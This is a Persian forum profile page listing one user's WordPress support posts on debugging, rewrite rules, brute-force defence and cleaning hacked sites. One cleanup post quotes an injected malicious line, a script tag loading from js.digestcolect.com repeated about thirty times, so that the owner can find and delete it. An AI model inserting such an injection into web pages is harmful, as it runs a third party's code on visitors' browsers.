رفتن به مطلب

damoon_zero

عضو سایت
  • تعداد ارسال ها

    107
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    10

تمامی مطالب نوشته شده توسط damoon_zero

  1. damoon_zero

    مشکل با ورژن PHP

    Error_Reporting رو فعال کنيد و اجازه بديد PHP خطاهای اتفاق افتاده رو گزارش بده ! از فايل wp-config.php هم خط Debug رو پيدا کنيد و TRUE کنيد خطاها رو اينجا بزاريد تا بشه برّسی و تحليلش کرد
  2. damoon_zero

    مهندسی نرم افزار یا it؟

    سلام مطلبی که مينويسم شايد از نظر دوستانی که مهندسی نرم افزار خوندن ناراحت کننده باشه و جبهه بگيرن ! ولی حقيقته! و اين گفته ها از زبان يک استاد خوب تو دانشگاه است زمانی که دانشجو بودم و اين استاد توی دانشگاه های معتبری تو آمريکا و اينگيليس استاد بود ! از شانس خوب ما تو يه دوره که اومده بود ايران تصميم به تدريس گرفته بود و از شانس خوب ما ، استاد ما شد تو يه بازه از زمان و بعد دوباره جمع کرد و رفت از ايران ! دوست عزيز رشته مهندسی نرم افزار ما تو دنيا نداريم بطور رسمی ! و اين رشته فقط تو ايران ساخته شده !!!! مهندسی کامپيوتر داريم ولی مهندسی نرم افزار نداريم ! مهندسی نرم افزار يک درسه ! يک چارت درسيه ! ولی رشته نيست توی دنيا ! اگه برای آينده کاری چيز معتبر ميخوای که خارج از ايران هم بتونی ازش استفاده کنی ( اگه بشه استفاده کرد ) دنبال مهندسی نرم افزار نرو ! مهندسی آی تی يا فناوری اطلاعات قابل قبول تر
  3. damoon_zero

    حذف سطح دسترسی در web.config

    مطمئن نيستم موقعی که سرور شما ويندوز باشه اين پيام رو ميده يا نه ... لطفاً بفرماييد سروری که سايت شما رو هاست کرده ويندوز يا لينوکس ؟ اگه لينوکس باشه بايد کانفيگ htaccess بزاريد ، اگه ويندوز همون فايلی که نوشتيد يعنی web.config که در اون صورت اگه ويندوز باشه بايد از فايل منيجر هاست بريد به دايرکتوری httpdocs و دايرکتوری روت وبسايت بعد دنبال فايل web.config بگرديد ... کد زير رو بهش اضافه کنيد بايد مشکلتون رو حل کنه ! <rewrite> <rules> <rule name="Main Rule" stopProcessing="true"> <match url=".*" /> <conditions logicalGrouping="MatchAll"> <add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" negate="true" /> </conditions> <action type="Rewrite" url="index.php" /> </rule> </rules> </rewrite> که بعد اينکه کد رو اضافه کرديد فايل web.config يه همچين شکلی ميشه مثلاً ! <?xml version="1.0" encoding="utf-8"?> <configuration> <system.webServer> <rewrite> <rules> <rule name="Main Rule" stopProcessing="true"> <match url=".*" /> <conditions logicalGrouping="MatchAll"> <add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" negate="true" /> </conditions> <action type="Rewrite" url="index.php" /> </rule> </rules> </rewrite> <staticContent> <remove fileExtension=".svg" /> <mimeMap fileExtension=".svg" mimeType="image/svg+xml" /> </staticContent> <defaultDocument> <files> <remove value="index.aspx" /> <add value="index.php" /> </files> </defaultDocument> </system.webServer> </configuration>
  4. damoon_zero

    مشکل باز نشدن سایت

    فايلهايی که پيدا کرده رو بايد پاک کنيد ! دقّت کنيد اشتباه پاک نکنيد مثلاً فايلهای پيدا شده رو نگاه کنيد اسمشون چيه ! مثلاً وردپرس همچين فايل هايی نداره ! اينا و پاک کنيد .... علت اينکه تم رو عوض کرديد باز اينجوريه به اين دليل است که 1 ) فايل های هسته وردپرس ممکنه آلوده شده باشه که در اينصورت تو اسکن نشون داده شده 2 ) Malware خودش رو تو فايلهای مختلف تم تزريق کرده مثل عکسايی که براتون فرستادم بايد چک کنيد و کد های مضر که اوّل فايلها اضافه شده رو پاک کنيد
  5. damoon_zero

    مشکل باز نشدن سایت

    فايل header.php هم از هاست باز کنيد و انتهای خط پنجم قبل از شروع تگ php تا خط اوّل هرچی هست پاک کنيد و save کنيد !
  6. damoon_zero

    مشکل باز نشدن سایت

    خط اوّل رو از فايل index.php پاک کنيد و فايل رو save کنيد ! کد بقيه فايل ها رو هم نگاه کنيد و اگه اين خط کد رو توش ديديد پاکش کنيد ! دقت کنيد انتهای خط اوّل تگ پی اچ پی رو پاک نکنيد و قبل از عبارت تگ PHP هر چی هست تا اوّل خط پاک کنيد <script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script>
  7. damoon_zero

    مشکل باز نشدن سایت

    جايی فايل هايی که پيدا کرده رو ليست نکرده ؟ Wordfence رو نصب کرديد ؟ با اين افزونه هم اسکن کريد ؟
  8. damoon_zero

    حذف ایمیل

    افزونه زير رو نصب کنيد ببينيد نيازتون رو برطرف می کنه ؟ https://wordpress.org/plugins/custom-registration-form-builder-with-submission-manager/
  9. damoon_zero

    ساخت سیستم درمانگاهی با وردپرس

    تا اونجايی که اطلاع دارم برای فعاليتهای پزشکی خوبه که از نرم افزارهايی در اين خصوص استفاده بشه که لايسنس هيپا دارند HIPAA لايسنسی هست که به نرم افزارها ، اپليکيشن ها و سيستم هايی داده ميشه که استانداردهای مصاف پزشکی رو رعايت کرده باشند . چون هرچی باشه اطلاعات مريض ها قرار که ذخيره بشه ! و مسئوليت داره ... اين به اين معنی نيست که استفاده از وردپرس بد است يا مثلاً وردپرس امن نيست ولی همونطور که ميبينيم هر از چند گاهی باگ هايی از اين سيستم مديريت محتوا کشف و گزارش ميشه حالا شما تصور کن زيرو دی هم باشه مثلاً و جای حساسی که داره مريض هاشو با وردپرس مديريت ميکنه سيستيمش رو اين باگ ها رو بشه روشون اکسپلويت کرد ...
  10. damoon_zero

    مشکل باز نشدن سایت

    بله درست ميشه ! ولی اين مهمّه بدونيد چطور اين اتفاق افتاده ! اگه حفره اي وجود داشته باشه دوباره نفوذ ممکنه انجام بشه ! بايد برّسی کنيد برای مسائل امنيتی چک بشه ! اگه براتون ممکنه فايل های زير رو از هاست زيپ کنيد و اينجا ضميمه کنيد تا سورس رو نگاهی بندازم header.php index.php wp-login.php پلاگين زير رو هم نصب کنيد و باهاش يه اسکن بکنيد ميشه با همين وضعيت سايت ، پاکسازيش کرد ... https://wordpress.org/plugins/quttera-web-malware-scanner/ در صورتی که به پشتيبانی امنيتی و نگهداری وبسايت . آنالايز و تست نفوذ هم نياز داشتيد من ميتونم کمکتون کنم پيام خصوصی بديد
  11. damoon_zero

    مشکل باز نشدن سایت

    شما افزونه Wordfence رو نصب کنيد و توسط اين افزونه سايتتون رو اسکن کنيد و نتيجه اسکن رو اينجا بزاريد ... تا من ببينم دقيقاً اين موش کثيف چيه رو سايت شما ! افزونه رو حتماً و حتماً از مخازن وردپرس نصب کنيد لطفاً بفرمائيد آيا از افزونه يا تم نال شده استفاده کرديد ؟ فعاليت مشکوکی چيزی بر نخورديد اين مدّت ؟
  12. damoon_zero

    مشکل باز نشدن سایت

    سايت شما هک شده و Malware توش گذاشته شده ... دارم برّسی ميکنم ... باشيد تا خبرش رو همينجا آپديت می کنم
  13. damoon_zero

    مشکل باز نشدن سایت

    لطفاً آدرس سايتتون رو برای برّسی بزاريد
  14. damoon_zero

    خطای لاگین

    حتی اگه بکاپ برگردونيد باز مشکل و حفره امنيتی وجود داره ! حفره وجود داشته که شما هک شديد حمله ميتونه از سرور انجام شده باشه ميتونه از سايت شما انجام شده باشه اگه بک آپ برگردونيد هم از همون جا که حمله شده بهتون دوباره ميتونه بهتون حمله بشه شما اوّل بايد اين موضوع رو با هاست در ميان بزاريد که اونا سمت خودشون رو چک کنن ! بعد هم که بک آپ رو برگردونيد بايد حفره رو پيدا کنيد و اقدامات امنيتی رو انجام بديد که دوباره هک نشيد ! و بعد از همه اينها بايد برای ايمن کردن سايتتون حتماً اقدام کنيد و اين خيلی مهمه !
  15. damoon_zero

    خطای لاگین

    بنظر مياد هک شده ! صفحه لاگين هم دستکاری شده ... agora-imbiss.com دوستمون آدرس سايتش رو سانسور هم ميکنه ! عکس لوگو وردپرس هم از يجا ديگه يه چيز ديگه سورس داده شده کلاً من که فکر ميکنم هک شده ! @سولماز نيازه که شما وردپرس رو دوباره نصب کنی يا اگه بک آپ داری ، بک آپ رو ريستورکنی و با رعايت نکات امنيتی سايت رو دوباره بالا بياری + برای بد افزار ها و کد های مشکوک فايل ها رو برّسی کنيد + محدوديت های لازم رو اعمال کنيد + کانفيگ امنيتی انجام بديد
  16. damoon_zero

    خطای دیتابیس

    پست اوّل :چرا لاگین نمیشم؟ هک شدم؟ پست دوّم : خطای لاگین پست سوّم : خطای دیتابیس اميدوارم پست چهارم خطای ورود به ايميلتون نباشه ميشه لطفاً بفرماييد اول اينکه وردپرس رو از کجا دانلود کرديد و نصب کرديد ? دوم اينکه چه تغييراتی داديد تا الان از اوّل ? سوم اينکه چی شد که اينطوری شد ... ?
  17. damoon_zero

    یک قالب کامل فارسی برای فروشگاه

    important! به اين معنی است که تمام rule های ديگه که برای اون کلاس در خصوص رنگ نوشته شده اند ناديده گرفته بشن و اين Rule برای رنگ اون عنصر در نظر گردفته بشه ! برای تغييرات در سايت شما متأسفانه وقتی ندارم در حال حاضر ولی اگه مايل هستيد برای پشتيبانی وب سايت ميتونم کمکتون کنم پشتيبانی شامل برّسی سايت شما تغييرات امنيت ونگهداری سايت درصورت تمايل پيام خصوصی بديد ... در خدمتم
  18. يه آدرس بديد من عملی ببينم چه اتفاقی داره ميافته
  19. نه منظور من اينه که از وضعيت الان يک بک آپ داشته باشيد ... بعد اون بک آپ اوّليه که قبل تغييرات گرفته بوديد رو ريستور کنيد نه اينکه الان بک آپ بگيريد بد همين بک آپ رو برگردونيد !
  20. چی بگم واللّه . بايد ديد . شما يکبار ريستور کن ديتابيس رو ببين مشکل حل ميشه ؟ شايد بخاطر افزونه کش يا يه افزونه مثل اونه که داره اين اتفاق ميافته اگه افزونه کش داريد . کش رو يکبار Clear کنيد و دوباره امتحان کنيد . آدرس سايت رو هم بديد که بشه عملاً ديد که چه اتفاقی داره ميافته
  21. نيازی نبود Custom رو انتخاب کنيد . ديتابيس رو انتخاب ميکرديد همون quick ميگرفتيد اوکی بود حالا همينطور که گفتم الان از ديتابيس يک بار ديگه بک آپ بگيريد بعد جدول های ديتابيس رو Drop کنيد و بعد اون بک اوّليه قبل تغييرات رو Import کنيد ! من ولی هنوز متوجه نشدم چرا از قسمت permalink تغييرات رو مثل قبل نميکنيد و مشکل چيه ؟
  22. damoon_zero

    راه حلی برای حملات brute force وجود داره؟

    پسورد قوی بزاريد و بزاريد حملات بروتفورسشون رو انجام بدن ! اگه روی صفحه ورود Captcha گذاشتيد که ديگه جای نگرانی نيست ! کد زير رو به فايل htaccess از فايل منيجر هاست اضافه کنيد ! اگه از XMLRPC استفاده نمی کنيد ( برای سايتتون App نداريد ) ... XMLRPC.php رو غير فعال و از دسترس خارج کنيد با افزونه Disable xmlrpc ميتونيد اين کار رو بکنيد يا از کد زير تو فايل htaccess استفاده کنيد حملات Bruteforce از طريق XMLRPC هم انجام ميشه حتی اگه Captcha داشته باشيد ... پس اگه از اين سرويس استفاده نمی کنيد جلوی دسترسی بهش رو بگيريد ! اگه استفاده می کنيد هم ميتونيد محدودش کنيد . کد زير در htaccess دسترسی به اين فايل رو برای همه منع ميکنه ! ( دستشون رو بزاريد تو پوست گردو ) <Files "xmlrpc.php"> Order Deny,Allow Deny from all </Files>
  23. کاری نکنيد ! اوّل بفرمائيد چطوری قبل تغييرات بک آپ گرفتيد از ديتابيس ؟
  24. الانم دوباره يه بک آپ بگيريد ... بعد همه table هارو Drop کنيد و بعد اون ديتابيس که قبل تغييرات Export کرده بوديد رو Import کنيد
×
×
  • اضافه کردن...